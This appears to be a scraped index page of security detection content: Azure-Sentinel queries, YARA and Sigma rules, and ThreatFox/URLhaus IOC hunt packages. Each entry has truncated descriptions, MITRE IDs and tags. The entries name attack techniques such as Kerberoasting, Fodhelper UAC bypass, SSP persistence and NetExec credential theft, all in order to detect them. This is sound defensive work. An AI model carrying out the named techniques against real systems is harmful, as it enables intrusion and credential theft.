'Detects successful signins using single factor authentication where the device, location, and ASN are abnormal. Single factor authentications pose an opportunity to access compromised accounts, inve

backdoormicrosoftofficial
Azure-Sentinel source
T1190
W3CIISLog

'Identifies connection attempts (success or fail) from clients with very short or very long User Agent strings and with less than 100 connection attempts.'

microsoftofficial
Yara-Rules source

Checks if being debugged

community
Yara-Rules source

Checks for the presence of known debug tools

community
Yara-Rules source

Anti-Sandbox checks for Anubis

community
Yara-Rules source

Anti-Sandbox checks for CWSandbox

community
Yara-Rules source

Anti-Sandbox checks for Joe Sandbox

community
Yara-Rules source

Anti-Sandbox checks for Sandboxie

community
Yara-Rules source

Anti-Sandbox checks for ThreatExpert

community
Yara-Rules source

AntiVM checks for Bios version

community
Yara-Rules source

AntiVM checks for VirtualBox

community
Yara-Rules source

AntiVM checks for VMWare

community
Azure-Sentinel source
T1078.004
AADNonInteractiveUserSignInLogsSigninLogs

Detects when there is a login attempt from a country that has not seen a successful login in the previous 14 days. Threat actors may attempt to authenticate with credentials from compromised accounts

backdoorcredential-theftmicrosoftofficial
Azure-Sentinel source
T1078.004
IdentityInfoSigninLogs

'Detects when a privileged user account successfully authenticates from a location, device or ASN that another admin has not logged in from in the last 7 days. Privileged accounts are a key target f

backdoormicrosoftofficial
Yara-Rules source

YARA rule: Check_FindWindowA_iat

community
Yara-Rules source

YARA rule: Check_OutputDebugStringA_iat

community
Yara-Rules source

YARA rule: check_RaiseException_iat

community
Yara-Rules source

YARA rule: Check_unhandledExceptionFiler_iat

community
Yara-Rules source

Anti-debug process memory working set size check

community
Yara-Rules source

Disable AntiVirus

community
Disable Firewall
yara low
Yara-Rules source

Disable Firewall

community
Yara-Rules source

Disable Registry editor

community
Yara-Rules source

Disable User Access Control

community
Azure-Sentinel source
T1110
SecurityEventWindowsEvent

'Identifies when failed logon attempts are 20 or higher during a 10 minute period (2 failed logons per minute minimum) from valid account.'

microsoftofficial
Azure-Sentinel source
T1110
W3CIISLog

'Identifies when 20 or more failed attempts from a given client IP in 1 minute occur on the IIS server. This could be indicative of an attempted brute force. This could also simply indicate a misconfi

credential-theftmicrosoftofficial
Azure-Sentinel source
T1078T1110
SigninLogs

'Identifies an interrupted sign-in session from a country the user has not sign-in before in the last 7 days, where the password was correct. Although the session is interrupted by other controls such

credential-theftmicrosoftofficial
Azure-Sentinel source
T1098T1078
SecurityEventWindowsEvent

'Identifies when a user account was created and then added to the builtin Administrators group in the same day. This should be monitored closely and all additions reviewed.'

backdoormicrosoftofficial
Azure-Sentinel source
T1078.004
IdentityInfoSigninLogs

'Detects a successful logon by a privileged account from an ASN not logged in from in the last 14 days. Monitor these logons to ensure they are legitimate and identify if there are any similar sign

microsoftofficial
Azure-Sentinel source
T1078.004

'Detects when there is a Service Principal login attempt from a country that has not seen a successful login in the previous 14 days. Threat actors may attempt to authenticate with credentials from

backdoorcredential-theftmicrosoftofficial
Azure-Sentinel source
T1134
SecurityEvent

'This query identifies whether an Active Directory user object was assigned a service principal name which could indicate that an adversary is preparing for performing Kerberoasting. This query check

microsoftofficial
Azure-Sentinel source
T1190
SecurityEventWindowsEvent

'This query looks for new processes being spawned by the Exchange UM service where that process has not previously been observed before. Reference: https://www.microsoft.com/security/blog/2021/03/02/

microsoftofficial
Azure-Sentinel source
T1190

'This query looks for errors that may indicate that an attacker is attempting to exploit a vulnerability in the service. Reference: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targetin

exploitmicrosoftofficial
Azure-Sentinel source
T1055
SecurityEventWindowsEvent

'Identifies a match across various data feeds for named pipe IOCs related to the Solorigate incident. For the sysmon events required for this detection, logging for Named Pipe Events needs to be conf

microsoftofficial
ThreatFox source
DnsEvents

Hunt package for 163 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: KongTuke IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 4 IOCs associated with KongTuke

iocjs-kongtukethreatfox
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 2 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with StrelaStealer

infostealeriocthreatfoxwin-strelastealer
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 28 IOCs associated with Vidar

iocthreatfoxwin-vidar
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 36 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 11 malicious URLs tagged as 45-156-87-194

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 37 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 3 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

The Mirai malware family is a botnet that compromises IoT devices to launch large-scale DDoS

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 8 malicious URLs tagged as Mozi

iocurlhaus
Azure-Sentinel source
T1098T1078
SecurityEventWindowsEvent

'Identifies when a user account has been added to a privileged built in domain local group or global group such as the Enterprise Admins, Cert Publishers or DnsAdmins. Be sure to verify this is an exp

microsoftofficial
Azure-Sentinel source
T1098T1078
SecurityEventWindowsEvent

'Identifies when a user account is created and then deleted within 10 minutes. This can be an indication of compromise and an adversary attempting to hide in the noise.'

microsoftofficial
Azure-Sentinel source
T1098T1078
SecurityEventWindowsEvent

'Identifies when a user account is enabled and then disabled within 10 minutes. This can be an indication of compromise and an adversary attempting to hide in the noise.'

microsoftofficial
Azure-Sentinel source
T1190T1203

'This query uses the Azure Defender Security Nested Recommendations data to find machines vulnerable to OMIGOD CVE-2021-38647. OMI is the Linux equivalent of Windows WMI and helps users manage configu

backdoorexploitmicrosoftofficialwmi
Azure-Sentinel source
T1552
SecurityEvent

'This detection uses Security events from the "AD FS Auditing" provider to detect suspicious object identifiers (OIDs) as part EventID 501 and specifically part of the Enhanced Key Usage attributes. T

microsoftofficial
Azure-Sentinel source
T1078
SecurityEvent

'This query detects modification in the AdminSDHolder in the Active Directory which could indicate an attempt for persistence. AdminSDHolder Modification is a persistence technique in which an attac

backdoormicrosoftofficialpersistence
Check Debugger
yara low
Yara-Rules source

YARA rule: Check_Debugger

community
Check Dlls
yara low
Yara-Rules source

YARA rule: Check_Dlls

community
Check DriveSize
yara low
Yara-Rules source

YARA rule: Check_DriveSize

community
Check FilePaths
yara low
Yara-Rules source

The 'Check_FilePaths

community
Yara-Rules source

YARA rule: Check_Qemu_Description

community
Yara-Rules source

YARA rule: Check_Qemu_DeviceMap

community
Check UserNames
yara low
Yara-Rules source

YARA rule: Check_UserNames

community
Yara-Rules source

YARA rule: Check_VBox_Description

community
Yara-Rules source

The 'Check_VBox_DeviceMap' rule detects potential malicious activity involving VirtualBox device mapping, such as unauthorized device redirection or suspicious

community
Yara-Rules source

YARA rule: Check_VBox_Guest_Additions

community
Yara-Rules source

YARA rule: Check_VBox_VideoDrivers

community
Check VmTools
yara low
Yara-Rules source

The 'Check_VmTools' YARA rule detects artifacts associated with virtual machine tools, which may indicate evasion techniques or malicious activity in virtualized environments

community
Yara-Rules source

YARA rule: Check_VMWare_DeviceMap

community
Check Wine
yara low
Yara-Rules source

YARA rule: Check_Wine

community
Azure-Sentinel source
T1543

'This query uses Sysmon Image Load (Event ID 7) and Process Create (Event ID 1) data to look for COM Event System being used to load a newly seen DLL.'

microsoftofficial
Yara-Rules source

YARA rule: DebuggerPattern__CPUID

community
Yara-Rules source

YARA rule: DebuggerPattern__SEH_Inits

community
Yara-Rules source

YARA rule: DebuggerPattern__SEH_Saves

community
Azure-Sentinel source
T1098

'This query detects an abuse of the DSRM account in order to maintain persistence and access to the organization's Active Directory. Ref: https://adsecurity.org/?p=1785'

microsoftofficialpersistence
Azure-Sentinel source
T1564
SecurityEvent

'This query detects domain user accounts creation (event ID 4720) where the username ends with $. Accounts that end with $ are normally domain computer accounts and when they are created the event ID

backdoormicrosoftofficial
Azure-Sentinel source
T1098T1078
SecurityEventWindowsEvent

'Identifies when a recently created Group was added to a privileged built in domain local group or global group such as the Enterprise Admins, Cert Publishers or DnsAdmins. Be sure to verify this is

microsoftofficial
Azure-Sentinel source
T1052
CloudAppEventsDeviceEventsDeviceFileEventsSecurityAlert

'This query looks for any mass download by a single user with possible file copy activity to a new USB drive. Malicious insiders may perform such activities that may cause harm to the organization. T

microsoftofficial
Azure-Sentinel source
T1005
SecurityEventWindowsEvent

'This detection uses Windows security events to detect suspicious access attempts to the registry key of Microsoft Entra ID Health monitoring agent. This detection requires an access control entry (AC

microsoftofficial
Azure-Sentinel source
T1005
SecurityEventWindowsEvent

'This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Microsoft Entra ID Health service agents (e.g AD FS). Information from AD H

backdoormicrosoftofficial
Azure-Sentinel source
T1059
SecurityEventWindowsEvent

'This query identifies when a process execution command-line indicates that a registry value is written to allow for later execution a malicious script References: https://www.microsoft.com/security/

microsoftofficial
Azure-Sentinel source
T1547
SecurityEventWindowsEvent

'This query idenifies when rundll32.exe executes a specific set of inline VBScript commands References: https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-

microsoftofficial
Azure-Sentinel source
T1546.008

'Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a

backdoormicrosoftofficialpersistence
Azure-Sentinel source
T1021
SecurityEventWindowsEvent

'Identifies when an RDP connection is made to multiple systems and above the normal connection count for the previous 7 days. Connections from the same system with the same account within the same day

microsoftofficial
Azure-Sentinel source
T1134
SecurityEvent

'This query identifies Active Directory computer objects modifications that allow an adversary to abuse the Resource-based constrained delegation. This query checks for event id 5136 that the Object

microsoftofficial
Azure-Sentinel source
T1554
SecurityEventWindowsEvent

'The query looks for source code files being modified immediately after a build process is started. The purpose of this is to look for malicious code injection during the build process. More details:

microsoftofficial
Azure-Sentinel source
T1558
SecurityEventWindowsEvent

'A service principal name (SPN) is used to uniquely identify a service instance in a Windows environment. Each SPN is usually associated with a service account. Organizations may have used service acc

backdoormicrosoftofficial
Azure-Sentinel source
T1021
SecurityEventWindowsEvent

'Identifies when an RDP connection is new or rare related to any logon type by a given account today compared with the previous 14 days. RDP connections are indicated by the EventID 4624 with LogonTyp

microsoftofficial
RDP Nesting
kql medium
Azure-Sentinel source
T1021
SecurityEventWindowsEvent

'Query detects potential lateral movement within a network by identifying when an RDP connection (EventID 4624, LogonType 10) is made to an initial system, followed by a subsequent RDP connection from

lateral-movementmicrosoftofficial
SEH Init
yara low
Yara-Rules source

YARA rule: SEH_Init

community
SEH Save
yara low
Yara-Rules source

YARA rule: SEH_Save

community
Azure-Sentinel source
T1195
SecurityAlert

'Surfaces any Defender Alert for Solorigate Events. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query joins the DeviceInfo table to clearl

microsoftofficial
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Mirai

elf-miraiiocthreatfox
ThreatFox source
DnsEvents

Hunt package for 63 IOCs associated with ClearFake

iocjs-clearfakethreatfox
ThreatFox: AMOS IOCs
ioc-hunt high
ThreatFox source
UrlClickEvents

Hunt package for 7 IOCs associated with AMOS

iocosx-amosthreatfox
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Hunt package for 7 IOCs associated with Unknown malware

iocthreatfoxunknown
ThreatFox source
UrlClickEvents

The "Unknown Loader" malware is a downloader that

iocthreatfoxunknown_loader
ThreatFox source
DnsEventsUrlClickEvents

The "Unknown Stealer" malware is a data-exfiltration

infostealeriocthreatfoxunknown_stealer
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 15 IOCs associated with NetSupportManager RAT

backdooriocthreatfoxwin-netsupportmanager_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 87 IOCs associated with Vidar

iocthreatfoxwin-vidar
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 26 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 26 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 30 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 7 malicious URLs tagged as Mozi

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as sh

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 7 malicious URLs tagged as ua-wget

iocurlhaus
Yara-Rules source

Possibly employs anti-virtualization techniques

community
Azure-Sentinel source
T1078T1489
AzureActivityIdentityInfoSecurityAlert

'This query will alert on any sign-ins from devices infected with malware in correlation with workspace deletion activity. Attackers may attempt to delete workspaces containing compute instances afte

backdoormicrosoftofficial
SigmaHQ source
T1112T1059.005
imRegistry

Detects suspicious registry modifications made by suspicious processes such as script engine processes such as WScript, or CScript etc. These processes are rarely used for legitimate registry modifica

evasionpersistence
SigmaHQ source
T1021.002T1059.005
imFileEvent

Detects file creation events indicating NetExec (nxc.exe) execution on the local machine. NetExec is a PyInstaller-bundled binary that extracts its embedded data files to a "_MEI<random>" directory un

backdoorcredential-theftexploitlateral-movement
SigmaHQ source
T1547.005
imRegistry

Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.

backdoor
SigmaHQ source
T1018T1021
imProcessCreate

Detects execution of the hacktool NetExec. NetExec (formerly CrackMapExec) is a widely used post-exploitation tool designed for Active Directory penetration testing and network enumeration In enterpri

backdoorcredential-theftexploit
Azure-Sentinel source
T1189

'This rule identifies a web request to a URL that holds a file type, including .ps1, .bat, .vbs, and .scr that can be harmful if downloaded. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) an

microsoftofficial
Azure-Sentinel source
T1496

'This rule identifies a web request with a user agent header known to belong to a crypto miner. This indicates a crypto miner may have infected the client machine.<br>You can add custom crypto mining

microsoftofficial
Azure-Sentinel source
T1059T1046T1021T1557T1102T1020

'This rule identifies a web request with a user agent header known to belong to a hacking tool. This indicates a hacking tool is used on the host.<br>You can add custom hacking tool indicating User-Ag

microsoftofficial
Azure-Sentinel source
T1132T1140T1059.001

'This rule identifies a web request with a user agent header known to belong PowerShell. <br>You can add custom Powershell indicating User-Agent headers using a watchlist, for more information refer t

microsoftofficialpowershell
Azure-Sentinel source
T1136.003
AuditLogsSigninLogs

'This query looks for an account being created from a domain that is not regularly seen in a tenant. Attackers may attempt to add accounts from these sources as a means of establishing persistant ac

backdoormicrosoftofficial
Azure-Sentinel source
T1078.004
AuditLogsIdentityInfo

'Detects when a Temporary Access Pass (TAP) is created for a Privileged Account. A Temporary Access Pass is a time-limited passcode issued by an admin that satisfies strong authentication requiremen

backdoormicrosoftofficial
Azure-Sentinel source
T1005
DeviceEventsSecurityEventWindowsEvent

'Identifies an export of the ADFS DKM Master Key from Active Directory. References: https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/, https://cloud.go

aptbackdoormicrosoftofficial
Azure-Sentinel source
T1199T1136T1078T1098
AADNonInteractiveUserSignInLogsOfficeActivitySigninLogs

'Detects anomalous IP address usage by user accounts and then checks to see if a suspicious Teams action is performed. Query calculates IP usage Delta for each user account and selects accounts where

microsoftofficial
Azure-Sentinel source
T1078
SigninLogs

'Identifies sign-in anomalies from an IP in the last hour, targeting multiple users where the password is correct after multiple attempts'

microsoftofficial
Azure-Sentinel source
T1211T1059T1190T0890
AzureDiagnostics

'Identifies a match for SQL Injection attack in the Application gateway WAF logs. The Threshold value in the query can be changed as per your infrastructure's requirement. References: https://owasp.o

microsoftofficial
Azure-Sentinel source
T1189T1203T0853
AzureDiagnostics

'Identifies a match for XSS attack in the Application gateway WAF logs. The Threshold value in the query can be changed as per your infrastructure's requirement. References: https://owasp.org/www-pro

microsoftofficial
Azure-Sentinel source
T1078.004
AuditLogs

'Detects changes to an Application ID URI. Monitor these changes to make sure that they were authorized. Ref: https://docs.microsoft.com/azure/active-directory/fundamentals/security-operations-app

backdoormicrosoftofficial
Azure-Sentinel source
T1078.004
AuditLogs

'Detects the redirect URL of an app being changed. Applications associated with URLs not controlled by the organization can pose a security risk. Ref: https://docs.microsoft.com/azure/active-direc

backdoormicrosoftofficial
Azure-Sentinel source
AuditLogs

'Identifies if an AV scan fails in Azure App Services.'

microsoftofficial
Azure-Sentinel source
AuditLogs

'Identifies if an AV scan finds infected files in Azure App Services.'

microsoftofficial
Azure-Sentinel source
T1204
DeviceProcessEventsSecurityEvent

This detects attempts to manipulate audit policies using auditpol command. This technique was seen in relation to Solorigate attack but the results can indicate potential malicious activity used in di

backdoormicrosoftofficial
Azure-Sentinel source
T1486
SecurityAlert

'This query looks for Microsoft Defender AV detections related to Dev-0530 actors. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query join

microsoftofficial
Azure-Sentinel source
T1486
SecurityAlert

'This query looks for Microsoft Defender AV detections related to Europium actor. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query join

microsoftofficial
Azure-Sentinel source
T1486
SecurityAlert

'This query looks for Microsoft Defender AV detections related to Hive Ransomware. In Microsoft Sentinel the SecurityAlerts table includes only the Device Name of the affected device, this query joins

microsoftofficialransomware
Azure-Sentinel source
T1562.008
AzureActivity

'This query looks for diagnostic settings that are removed from a resource. This could indicate an attacker or malicious internal trying to evade detection before malicious act is performed. If the di

microsoftofficial
Azure-Sentinel source
T1570T1212
AzureActivityBehaviorAnalytics

'Identifies when the Azure Run Command operation is executed by a UserPrincipalName and IP Address that has resulted in a recent user entity behaviour alert.'

backdoormicrosoftofficial
Azure-Sentinel source
T1570T1059.001
AzureActivityDeviceEventsDeviceFileEvents

'Identifies when Azure Run command is used to execute a PowerShell script on a VM that is unique. The uniqueness of the PowerShell script is determined by taking a combined hash of the cmdLets it impo

backdoormicrosoftofficialpowershell
Azure-Sentinel source
T1078.004
AuditLogs

'Detects changes to an applications sign out URL. Look for any modifications to a sign out URL. Blank entries or entries to non-existent locations would stop a user from terminating a session. Ref

backdoormicrosoftofficial
Azure-Sentinel source
T1078.004
AuditLogs

'Detects changes to the ownership of an appplicaiton. Monitor these changes to make sure that they were authorized. Ref: https://learn.microsoft.com/en-gb/entra/architecture/security-operations-ap

backdoormicrosoftofficial
Azure-Sentinel source
T1078.004
AuditLogs

'PIM provides a key mechanism for assigning privileges to accounts, this query detects changes to PIM role settings. Monitor these changes to ensure they are being made legitimately and don't confer

backdoormicrosoftofficial
Azure-Sentinel source
T1078
AADNonInteractiveUserSignInLogsCommonSecurityLogSigninLogs

'Correlate IPs blocked by a Cisco firewall appliance with successful Microsoft Entra ID signins. Because the IP was blocked by the firewall, that same IP logging on successfully to Entra ID is potenti

credential-theftmicrosoftofficial
Azure-Sentinel source

'IP addresses of broadband links that usually indicates users attempting to access their home network, for example for a remote session to a home computer.'

backdoormicrosoftofficial
Azure-Sentinel source

'Detects first connection to an unpopular website (possible malicious payload delivery).'

microsoftofficial
Azure-Sentinel source

'Detects suspicious user agent strings used by crypto miners in proxy logs.'

microsoftofficial
Azure-Sentinel source

'Rule helps to detect empty and unusual user agent indicating web browsing activity by an unusual process other than a web browser.'

microsoftofficial
Azure-Sentinel source

'Detects suspicious user agent strings used by known hack tools'

microsoftofficial
Azure-Sentinel source

'Rule helps to detect a rare user-agents indicating web browsing activity by an unusual process other than a web browser.'

microsoftofficial
Azure-Sentinel source

'It is reccomended that these Categories shoud be blocked by policies because they provide harmful/malicious content..'

microsoftofficial
Azure-Sentinel source

'Detects request to potentially harmful file types (.ps1, .bat, .vbs, etc.).'

microsoftofficial
Azure-Sentinel source

'Malware can use IP address to communicate with C2.'

microsoftofficial
Azure-Sentinel source

'Rule helps to detect Powershell user-agent activity by an unusual process other than a web browser.'

microsoftofficialpowershell
Azure-Sentinel source
T1574
DeviceRegistryEventsSecurityEvent

'This query looks for changes to COM registry keys to point to files in C:\Windows\System32\spool\drivers\color\. This can be used to enable COM hijacking for persistence. Ref: https://www.microso

exploitmicrosoftofficialpersistence
Azure-Sentinel source
T1078.004
AuditLogs

'Detects a Conditional Access Policy being modified by a user who has not modified a policy in the last 14 days. A threat actor may try to modify policies to weaken the security controls in place.

backdoormicrosoftofficial
Azure-Sentinel source
T1567.002T1102.002
CommonSecurityLog

'CreepyDrive uses OneDrive for command and control, however, it makes regular requests to predicatable paths. This detecton will alert when over 20 sequences are observed in a single day.'

microsoftofficial
CreepyDrive URLs
kql high
Azure-Sentinel source
T1567.002T1102.002
CommonSecurityLog

'CreepyDrive uses OneDrive for command and control. This detection identifies URLs specific to CreepyDrive.'

microsoftofficial
Azure-Sentinel source
T1098T1078
AuditLogs

'Privileged Identity Management (PIM) generates alerts when there is suspicious or unsafe activity in Microsoft Entra ID (Azure AD) organization. This query will help detect attackers attempts to dis

backdoormicrosoftofficial
Azure-Sentinel source
T1078T1548
AuditLogsOfficeActivitySecurityAlert

'This hunting query will alert on any Impossible travel activity in correlation with mailbox permission tampering followed by account being added to a PIM managed privileged group. Ensure this impossi

microsoftofficial
Azure-Sentinel source
T1569T1003
DeviceProcessEventsSecurityAlert

'This hunting query looks for file paths/hashes related to observed activity by Dev-0228. The actor is known to use custom version of popular tool like PsExec, Procdump etc. to carry its activity. Th

lateral-movementmicrosoftofficial
Azure-Sentinel source
T1486
DeviceFileEventsimFileEvent

'Dev-0530 actors are known to encrypt the contents of the victims device as well as renaming the file extensions. This query looks for the creation of files with .h0lyenc extension or presence of rans

microsoftofficialransomware
Azure-Sentinel source
T1068T1078
DeviceProcessEventsSecurityEventWindowsEvent

This query detects attempts to add attacker devices as allowed IDs for active sync using the Set-CASMailbox command. This technique was seen in relation to Solorigate attack but the results can indica

backdoormicrosoftofficialpowershell
Azure-Sentinel source
T1078.004
AuditLogs

'Detects a user's consent to an OAuth application being blocked due to it being too risky. These events should be investigated to understand why the user attempted to consent to the applicaiton and

backdoormicrosoftofficial
Azure-Sentinel source
T1071T1003
CommonSecurityLogDeviceFileEventsDeviceImageLoadEventsDeviceNetworkEventsDnsEventsOfficeActivityVMConnectionimFileEvent

'Identifies a match across various data feeds for hashes and IP IOC related to Europium Reference: https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-t

microsoftofficial
Azure-Sentinel source
T1059.001T1059.003
DeviceProcessEventsW3CIISLog

'This query dynamically identifies Exchange servers and then looks for instances where the IIS worker process initiates a call out to a remote URL using either cmd.exe or powershell.exe. This behaviou

exploitmicrosoftofficialpowershell
Azure-Sentinel source
T1078T1110
SigninLogs

'Identifies a list of IP addresses with a minimum number (default of 5) of failed logon attempts to AWS Console. Uses that list to identify any successful Microsoft Entra ID logons from these IPs with

microsoftofficial
Azure-Sentinel source
T1078T1110
AADNonInteractiveUserSignInLogsSigninLogs

'Identifies a list of IP addresses with a minimum number (defualt of 5) of failed logon attempts to Microsoft Entra ID. Uses that list to identify any successful AWS Console logons from these IPs with

microsoftofficial
Azure-Sentinel source
T1078T1110
AADNonInteractiveUserSignInLogsSecurityEventSigninLogsSyslogWindowsEvent

'Identifies a list of IP addresses with a minimum number (default of 5) of failed logon attempts to Microsoft Entra ID. Uses that list to identify any successful remote logons to hosts from these IPs

microsoftofficial
Azure-Sentinel source
T1078T1110
AADNonInteractiveUserSignInLogsSecurityEventSigninLogsSyslogWindowsEvent

'Identifies a list of IP addresses with a minimum number(default of 5) of failed logon attempts to remote hosts. Uses that list to identify any successful logons to Microsoft Entra ID from these IPs w

microsoftofficial
Azure-Sentinel source
T1071T1571
CommonSecurityLog

'Identifies patterns in the time deltas of contacts between internal and external IPs in Fortinet network data that are consistent with beaconing. Accounts for randomness (jitter) and seasonality suc

aptcobalt-strikemicrosoftofficial
Azure-Sentinel source
T1210
SecurityEventWindowsEvent

'This query detects instances where an attacker has gained the ability to execute code on an ADFS Server through remote WMI Execution. In order to use this query you need to be collecting Sysmon Event

microsoftofficialwmi
Azure-Sentinel source
T1078.004
AuditLogs

'Detects when a Guest User is added by a user account that has not been seen adding a guest in the previous 14 days. Monitoring guest accounts and the access they are provided is important to detect

backdoormicrosoftofficial
Azure-Sentinel source
T1078T1098T1114
OfficeActivitySigninLogs

'It is possible that a disabled user account is compromised and another account on the same IP is used to perform operations that are not typical for that user. The query filters the SigninLogs for e

backdoormicrosoftofficial
Azure-Sentinel source
T1570
DeviceProcessEventsSecurityEventimProcessCreate

'The query below identifies powershell commands used by the threat actor Mango Sandstorm. Reference: https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-u

microsoftofficialpowershell
Azure-Sentinel source
T1041T1071.001
CommonSecurityLogDeviceNetworkEvents

'This detection will identify network requests in HTTP proxy data that contains Base64 encoded IP addresses. After identifying candidates the query joins with DeviceNetworkEvents to idnetify any machi

backdoormicrosoftofficial
Azure-Sentinel source
T1078T1110
AADNonInteractiveUserSignInLogsCommonSecurityLogSigninLogs

This query creates a list of IP addresses with the number of failed login attempts to Entra ID above a set threshold ( default of 5 ). It then looks for any successful Palo Alto VPN logins from any

microsoftofficial
Azure-Sentinel source
T1071
AzureDiagnosticsCommonSecurityLogVMConnection

'Matches domain name IOCs related to Forest Blizzard group activity published July 2019 with CommonSecurityLog, DnsEvents and VMConnection dataTypes. References: https://blogs.microsoft.com/on-the-iss

microsoftofficial
Azure-Sentinel source
T1078
CommonSecurityLogSecurityAlertSigninLogs

'This content is employed to correlate with Microsoft Defender XDR phishing-related alerts. It focuses on instances where a user successfully connects to a phishing URL from a non-Microsoft network de

microsoftofficialphishing
Azure-Sentinel source
T1189T1071T1203
AADNonInteractiveUserSignInLogsAzureDiagnosticsOfficeActivitySigninLogsW3CIISLog

'Malware authors will sometimes hardcode user agent string values when writing the network communication component of their malware. Malformed user agents can be an indication of such malware.'

microsoftofficial
Azure-Sentinel source
T1071
AzureDiagnosticsCommonSecurityLogDeviceFileEventsDeviceImageLoadEventsDeviceNetworkEventsDnsEventsOfficeActivityVMConnectionimFileEvent

'Identifies a match across various data feeds for domains, hashes and IP IOC related to Mercury Reference: https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabiliti

microsoftofficial
Azure-Sentinel source
T1190
SecurityAlert

'This query looks for Microsoft Defender for Endpoint detections related to the remote command execution attempts on Azure IR with Managed VNet or SHIR. In Microsoft Sentinel, the SecurityAlerts tabl

exploitmicrosoftofficial
Azure-Sentinel source
T1499T1564
Heartbeat

'This detection will go over the heartbeats received from the agents of Domain Controllers over the last hour, and will create alerts if the last heartbeats were received an hour ago.'

microsoftofficial
Azure-Sentinel source
T1078T1110
AuditLogsOfficeActivitySecurityEventSyslogWindowsEvent

'This query will determine multiple password resets by user across multiple data sources. Account manipulation including password reset may aid adversaries in maintaining access to credentials and cer

credential-theftmicrosoftofficial
Azure-Sentinel source
T1098T1078
OfficeActivity

'Often times after the initial compromise the attackers create inbox rules to delete emails that contain certain keywords. This is done so as to limit ability to warn compromised users that they've b

microsoftofficialphishing
Azure-Sentinel source
T1114T1020
OfficeActivity

'Identifies when multiple (more than one) users mailboxes are configured to forward to the same destination. This could be an attacker-controlled destination mailbox configured to collect mail from mu

microsoftofficial
Azure-Sentinel source
T1190
Heartbeat

Following the September 14th, 2021 release of three Elevation of Privilege (EoP) vulnerabilities (CVE-2021-38645, CVE-2021-38649, CVE-2021-38648) and one unauthenticated Remote Code Execution (RCE) vu

exploitmicrosoftofficial
Azure-Sentinel source
T1203
DeviceFileEvents

'This query looks for writes of PE files to C:\Windows\System32\spool\drivers\color\. This is a common directory used by malware, as well as some legitimate programs, and writes of PE files to the f

exploitmicrosoftofficial
Azure-Sentinel source
T1566
CommonSecurityLogSecurityAlert

'The purpose of this content is to identify successful phishing links accessed by users. Once a user clicks on a phishing link, we observe successful network activity originating from non-Microsoft ne

microsoftofficialphishing
Azure-Sentinel source
T1568
CommonSecurityLog

'Identifies contacts with domains names in CommonSecurityLog that might have been generated by a Domain Generation Algorithm (DGA). DGAs can be used by malware to generate rendezvous points that are d

backdoormicrosoftofficial
Azure-Sentinel source
T1568

'This rule identifies communication with hosts that have a domain name that might have been generated by a Domain Generation Algorithm (DGA). DGAs are used by malware to generate rendezvous points tha

backdoormicrosoftofficial
Azure-Sentinel source
T1548.002
imRegistry

'This detection looks for the steps required to conduct a UAC bypass using Fodhelper.exe. By default this detection looks for the setting of the required registry keys and the invoking of the process

evasionmicrosoftofficial
Azure-Sentinel source
T1203
CommonSecurityLogDeviceEventsDeviceFileEventsDeviceImageLoadEventsSecurityAlertimFileEvent

'This query looks for file hashes and AV signatures associated with Prestige ransomware payload.'

microsoftofficialransomware
Azure-Sentinel source
T1190

'This query identifies exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893) to the VPN server'

exploitmicrosoftofficial
Azure-Sentinel source
T1071
CommonSecurityLogSigninLogs

'This content is utilized to identify instances of successful login by risky users, who have been observed engaging in potentially suspicious network activity on non-Microsoft network devices.'

microsoftofficial
Azure-Sentinel source
T1041T1071.001
CommonSecurityLog

